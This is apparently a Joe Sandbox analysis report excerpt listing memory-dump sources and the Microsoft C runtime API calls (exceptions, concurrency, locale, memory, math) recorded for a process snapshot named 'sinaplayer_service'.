                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __dexp_dtest$Cbuild_cimag_creal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2547048650-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120 ref: 6D0F7E9E
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15D0DC), ref: 6D0F7EB3
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0F7EC0
                                                                                                                                                                                                    • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCMT ref: 6D0F7F15
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6D0F7F50
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6D0F7F98
                                                                                                                                                                                                      • Part of subcall function 6D094872: TlsGetValue.KERNEL32(?,6D0948CA,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D09488E
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000048,?), ref: 6D0F7FCC
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E7484,6D15CEB0), ref: 6D0F7FE1
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,?,?,?,?,6D0E7484,6D15CEB0), ref: 6D0F8006
                                                                                                                                                                                                    • ?_Abort@_StructuredTaskCollection@details@Concurrency@@AAEXXZ.MSVCR120(00000048,?,6D15D0DC), ref: 6D0F8061
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6D0F8081
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000000,?,00000048,?,6D15D0DC), ref: 6D0F8091
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??0exception@std@@$Base::CancellationConcurrency::details::ContextVisible$ExceptionTaskThrow$Abort@_Base::_CollectionCollection@details@Concurrency::details::_Concurrency@@H_prolog3_catchStateStructuredTokenValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1204123976-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _mbstowcs_s.LIBCMT(?,00000000,00000000,?,7FFFFFFF,6D0930E8,00000020), ref: 6D092F98
                                                                                                                                                                                                      • Part of subcall function 6D092F50: _mbstowcs_s_l.MSVCR120(?,?,?,?,?,00000000), ref: 6D092F64
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(?,00000002), ref: 6D092FAD
                                                                                                                                                                                                    • _mbstowcs_s.LIBCMT(00000000,00000000,?,?,00000000), ref: 6D092FCA
                                                                                                                                                                                                    • _wsetlocale.MSVCR120(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D092FDF
                                                                                                                                                                                                      • Part of subcall function 6D0932B8: _getptd.MSVCR120(6D0933E8,00000014,6D092FE4,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D0932D3
                                                                                                                                                                                                      • Part of subcall function 6D0932B8: _calloc_crt.MSVCR120(000000B8,00000001), ref: 6D0932F0
                                                                                                                                                                                                      • Part of subcall function 6D0932B8: _lock.MSVCR120(0000000C), ref: 6D093306
                                                                                                                                                                                                      • Part of subcall function 6D0932B8: __copytlocinfo_nolock.LIBCMT ref: 6D093317
                                                                                                                                                                                                      • Part of subcall function 6D0932B8: wcscmp.MSVCR120(00000000,6D15F880,00000000,00000000,00000000), ref: 6D093351
                                                                                                                                                                                                      • Part of subcall function 6D0932B8: _lock.MSVCR120(0000000C,00000000,00000000,00000000), ref: 6D093368
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D092FE8
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    • _getptd.MSVCR120(00000000,00000000,00000000), ref: 6D092FFB
                                                                                                                                                                                                    • _wcstombs_s_l.MSVCR120(00000000,00000000,00000000,?,00000000,?,00000000), ref: 6D093022
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(-00000004,?,?,?,?,?,?,00000000), ref: 6D093039
                                                                                                                                                                                                      • Part of subcall function 6D092226: malloc.MSVCR120(6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D092237
                                                                                                                                                                                                    • _wcstombs_s_l.MSVCR120(00000000,00000004,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 6D093060
                                                                                                                                                                                                    • _lock.MSVCR120(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D093075
                                                                                                                                                                                                      • Part of subcall function 6D08EDD7: EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0930BA
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0E0092
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D0E00B1
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D0E00FB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$_lock$_calloc_crt_getptd_mbstowcs_s_wcstombs_s_l$CriticalEnterFreeHeapSection__copytlocinfo_nolock_invoke_watson_malloc_crt_mbstowcs_s_l_wsetlocalemallocwcscmp
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1259114276-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0A4CDD
                                                                                                                                                                                                    • ??0_ReentrantBlockingLock@details@Concurrency@@QAE@XZ.MSVCR120(00000004,6D0A4EF7,00000000,?,00000000), ref: 6D0A4CFB
                                                                                                                                                                                                      • Part of subcall function 6D0A5C29: __crtInitializeCriticalSectionEx.MSVCR120(?,00000000,00000180,6D0A4ACC,?,?,?,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A5C35
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000001,00000004,6D0A4EF7,00000000,?,00000000), ref: 6D0A4D4C
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000002,00000001,00000004,6D0A4EF7,00000000,?,00000000), ref: 6D0A4D5B
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000003,00000002,00000001,00000004,6D0A4EF7,00000000,?,00000000), ref: 6D0A4D6A
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000005,00000003,00000002,00000001,00000004,6D0A4EF7,00000000,?,00000000), ref: 6D0A4D79
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000006,00000005,00000003,00000002,00000001,00000004,6D0A4EF7,00000000,?,00000000), ref: 6D0A4D88
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000008,00000006,00000005,00000003,00000002,00000001,00000004,6D0A4EF7,00000000,?,00000000), ref: 6D0A4D97
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000838), ref: 6D0A4E4D
                                                                                                                                                                                                      • Part of subcall function 6D08EE11: malloc.MSVCR120(?), ref: 6D08EE1A
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::HillClimbing.LIBCMT ref: 6D0A4E60
                                                                                                                                                                                                    • ?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR120 ref: 6D0A4E68
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A4E85
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6D0D3476
                                                                                                                                                                                                    • GetThreadPriority.KERNEL32(00000000), ref: 6D0D347D
                                                                                                                                                                                                      • Part of subcall function 6D0A58DA: __EH_prolog3.LIBCMT ref: 6D0A58E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Policy$Concurrency@@$ElementKey@2@@Policy@SchedulerValue@$H_prolog3HillThread$??0_??2@BlockingClimbingClimbing::Concurrency::details::Count@CriticalCurrentInitializeLock@details@NodePriorityProcessorReentrantSection__crtmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1717548414-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno$__cftof
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 813615167-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getdrive.MSVCR120(?,?,?), ref: 6D0ABDBD
                                                                                                                                                                                                      • Part of subcall function 6D094728: GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 6D094754
                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00000000,?,?,?,?,?), ref: 6D0ABE0D
                                                                                                                                                                                                    • __validdrive.LIBCMT ref: 6D0D47CA
                                                                                                                                                                                                    • __doserrno.MSVCR120(?,?,?), ref: 6D0D47D8
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?), ref: 6D0D47E3
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?), ref: 6D0D47EE
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?), ref: 6D0D47F8
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$CurrentDirectoryFullNamePath__doserrno__validdrive_getdrive_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4038912475-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6D0A5BDF
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(6D160A9C,6D160AB8,00000024,6D0D26F0,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000), ref: 6D0A5BEE
                                                                                                                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000,?,00000000), ref: 6D0A5BF5
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000,?,6D0A69B0,00000002,00000001), ref: 6D0D24D8
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000,?,6D0A69B0,00000002), ref: 6D0D24EE
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000), ref: 6D0D24FC
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6D0D250A
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000000C,00000000), ref: 6D0D251B
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000008,00000000), ref: 6D0D2544
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@CurrentProcess$AffinityConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionH_prolog3_LastMaskThreadThrow
                                                                                                                                                                                                    • String ID: .im
                                                                                                                                                                                                    • API String ID: 1331674153-4014146257
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32(00000000,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B3FFF
                                                                                                                                                                                                    • free.MSVCR120(005C2D90,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B4018
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    • free.MSVCR120(005C2D90,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B402B
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B4049
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B405B
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B406C
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B4077
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0B409B
                                                                                                                                                                                                    • EncodePointer.KERNEL32(005C2A20), ref: 6D0B40A2
                                                                                                                                                                                                    • free.MSVCR120(005C74F0), ref: 6D0B40E3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$Pointer$DecodeEncodeFreeHeap
                                                                                                                                                                                                    • String ID: *\$y[
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • TlsAlloc.KERNEL32 ref: 6D0A6F16
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2045
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D205B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2069
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D206F
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20B5
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C9
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20DF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20ED
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20F3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionLastThrow$Version@$AllocConcurrency@@Manager@1@Resource
                                                                                                                                                                                                    • String ID: ]lm
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTraceGuidsW), ref: 6D0A6D45
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,UnregisterTraceGuids), ref: 6D0A6D57
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,TraceEvent), ref: 6D0A6D6A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceLoggerHandle), ref: 6D0A6D7D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceEnableLevel), ref: 6D0A6D90
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceEnableFlags), ref: 6D0A6DA3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                    • String ID: GetTraceEnableFlags$GetTraceEnableLevel$GetTraceLoggerHandle$RegisterTraceGuidsW$TraceEvent$UnregisterTraceGuids
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0F8CF3
                                                                                                                                                                                                      • Part of subcall function 6D0F87CF: __EH_prolog3.LIBCMT ref: 6D0F87D6
                                                                                                                                                                                                      • Part of subcall function 6D0F87CF: Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6D0F87ED
                                                                                                                                                                                                      • Part of subcall function 6D0A3AF4: TlsGetValue.KERNEL32(6D0A3DF7,00000000,00000000,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A3AFA
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,00000074), ref: 6D0F8DA2
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E7484,6D15CEB0), ref: 6D0F8DB7
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6D0F8DE6
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6D0F8E31
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,00000074), ref: 6D0F8E5D
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,00000074), ref: 6D0F8EDB
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,00000074), ref: 6D0F8F24
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??0exception@std@@$Base::Concurrency::details::Context$CancellationVisible$CreateExceptionH_prolog3H_prolog3_catchQueueThrowValueWork
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcsnlen.LIBCMT(?,?,?,?,?,?,?,6D09F9DA,?,?,?,?), ref: 6D09F96D
                                                                                                                                                                                                    • __crtLCMapStringW.MSVCR120(?,00000200,?,000000FF,00000000,00000000,?,?,?,?,?,6D09F9DA,?,?,?,?), ref: 6D09FA0E
                                                                                                                                                                                                    • __crtLCMapStringW.MSVCR120(?,00000200,?,000000FF,00000000,00000000,?,6D09F9DA,?,?,?,?), ref: 6D09FA8A
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(?,?,00000000,?,?,?,?,?,?,?,6D09F9DA,?,?,?,?), ref: 6D09FA9F
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,?,?,?,?,?,?,?,?,?,?,6D09F9DA,?,?,?,?), ref: 6D09FAAA
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,6D09F9DA,?,?,?,?), ref: 6D0DADEC
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,6D09F9DA,?,?,?,?), ref: 6D0DADF6
                                                                                                                                                                                                    • _errno.MSVCR120(?,6D09F9DA,?,?,?,?), ref: 6D0DAE09
                                                                                                                                                                                                    • _errno.MSVCR120(?,6D09F9DA,?,?,?,?), ref: 6D0DAE14
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$String__crt$_freea_s_invalid_parameter_noinfo_wcsnlenwcscpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1691615764-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strnlen.MSVCR120(?,?,?,?,?,?,?,6D0AF52F,?,?,?,?), ref: 6D0AF424
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(?,?,00000100,?,000000FF,00000000,00000000,?,00000001,?,?,?,?,?,6D0AF52F,?), ref: 6D0AF45A
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(?,?,00000100,?,000000FF,00000000,00000000,?,00000001,?,?,?,?,6D0AF52F,?,?), ref: 6D0AF4D4
                                                                                                                                                                                                    • strcpy_s.MSVCR120(?,?,00000000), ref: 6D0AF4E9
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000), ref: 6D0AF4F4
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,6D0AF52F,?,?,?,?), ref: 6D0DAAA5
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,6D0AF52F,?,?,?,?), ref: 6D0DAAAF
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6D0AF52F,?,?,?,?), ref: 6D0DAABE
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6D0AF52F,?,?,?,?), ref: 6D0DAAC9
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6D0AF52F,?,?,?,?), ref: 6D0DAAF2
                                                                                                                                                                                                    • malloc.MSVCR120(00000008,?,?,?,?,6D0AF52F,?,?,?,?), ref: 6D0DAAFC
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6D0AF52F,?,?,?,?), ref: 6D0DAB17
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,6D0AF52F,?,?), ref: 6D0DAB24
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$String__crt$_freea_s_invalid_parameter_noinfomallocstrcpy_sstrnlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2821879312-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,?,00000000,?), ref: 6D094C2A
                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000), ref: 6D0D42DF
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0D42E9
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000), ref: 6D0D42F0
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D430D
                                                                                                                                                                                                    • calloc.MSVCR120(?,00000002), ref: 6D0D4322
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4333
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4340
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D434B
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0D4359
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D435F
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0D4376
                                                                                                                                                                                                    • _wgetcwd.MSVCR120(?,?), ref: 6D0D4387
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$FullNamePathfree$ErrorLast__dosmaperr_invalid_parameter_noinfo_wgetcwdcalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3145916893-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _cimagf.LIBCMT(?,?), ref: 6D146881
                                                                                                                                                                                                    • _clogf.LIBCMT(?,?), ref: 6D146899
                                                                                                                                                                                                      • Part of subcall function 6D146155: _crealf.LIBCMT(?,?), ref: 6D146163
                                                                                                                                                                                                      • Part of subcall function 6D146155: _cimagf.LIBCMT(?,?,?,?), ref: 6D146171
                                                                                                                                                                                                      • Part of subcall function 6D146155: _fdtest.MSVCR120(?,?,?,?,?), ref: 6D14617D
                                                                                                                                                                                                      • Part of subcall function 6D146155: _fdtest.MSVCR120(?,?,?,?,?,?), ref: 6D146189
                                                                                                                                                                                                      • Part of subcall function 6D146155: __FCbuild.LIBCMT ref: 6D14635A
                                                                                                                                                                                                    • __FCmulcc.LIBCMT ref: 6D1468A6
                                                                                                                                                                                                      • Part of subcall function 6D1467B2: _crealf.LIBCMT(?,?,00000000,?,?,?), ref: 6D1467BE
                                                                                                                                                                                                      • Part of subcall function 6D1467B2: _cimagf.LIBCMT(?,?,?,?,00000000,?,?,?), ref: 6D1467CC
                                                                                                                                                                                                      • Part of subcall function 6D1467B2: _crealf.LIBCMT(00000000,?,?,?,?,?,00000000,?,?,?), ref: 6D1467DA
                                                                                                                                                                                                      • Part of subcall function 6D1467B2: _cimagf.LIBCMT(00000000,?,00000000,?,?,?,?,?,00000000,?,?,?), ref: 6D1467E8
                                                                                                                                                                                                      • Part of subcall function 6D1467B2: __FCbuild.LIBCMT(?,?,?,?,?,?,00000000,?,?,?), ref: 6D14682A
                                                                                                                                                                                                    • _cexpf.LIBCMT(00000000,?,?,?,00000000,?,?,?), ref: 6D1468AD
                                                                                                                                                                                                      • Part of subcall function 6D145AA8: _crealf.LIBCMT(?,?), ref: 6D145AB5
                                                                                                                                                                                                      • Part of subcall function 6D145AA8: _cimagf.LIBCMT(?,?,?,?), ref: 6D145AC3
                                                                                                                                                                                                      • Part of subcall function 6D145AA8: _fdtest.MSVCR120(?,?,?,?,?), ref: 6D145ACF
                                                                                                                                                                                                      • Part of subcall function 6D145AA8: _fdtest.MSVCR120(?,?,?,?,?,?), ref: 6D145ADB
                                                                                                                                                                                                      • Part of subcall function 6D145AA8: __FCbuild.LIBCMT ref: 6D145C51
                                                                                                                                                                                                    • _cimagf.LIBCMT(?,?), ref: 6D1468BD
                                                                                                                                                                                                    • _crealf.LIBCMT(?,?), ref: 6D1468D9
                                                                                                                                                                                                    • _logf.LIBCMT ref: 6D1468E2
                                                                                                                                                                                                    • __FCmulcr.LIBCMT ref: 6D1468F0
                                                                                                                                                                                                    • _cexpf.LIBCMT(00000000,?,?,?,?), ref: 6D1468F7
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _cimagf$_crealf$_fdtest$Cbuild$_cexpf$CmulccCmulcr_clogf_logf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3754504586-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6D0F46D4
                                                                                                                                                                                                      • Part of subcall function 6D11DD30: std::exception::_Copy_str.LIBCMT(?,?,?,6D11DD23,?,?,?,6D0DB529,Attempted a typeid of NULL pointer!,6D0940D0,00000014), ref: 6D11DD49
                                                                                                                                                                                                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCMT ref: 6D0F4714
                                                                                                                                                                                                    • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR120 ref: 6D0F4732
                                                                                                                                                                                                    • SwitchToThread.KERNEL32 ref: 6D0F473B
                                                                                                                                                                                                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCMT ref: 6D0F474E
                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 6D0F476A
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6D0F47A0
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E754C,6D15CEE8), ref: 6D0F47B7
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0F498E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
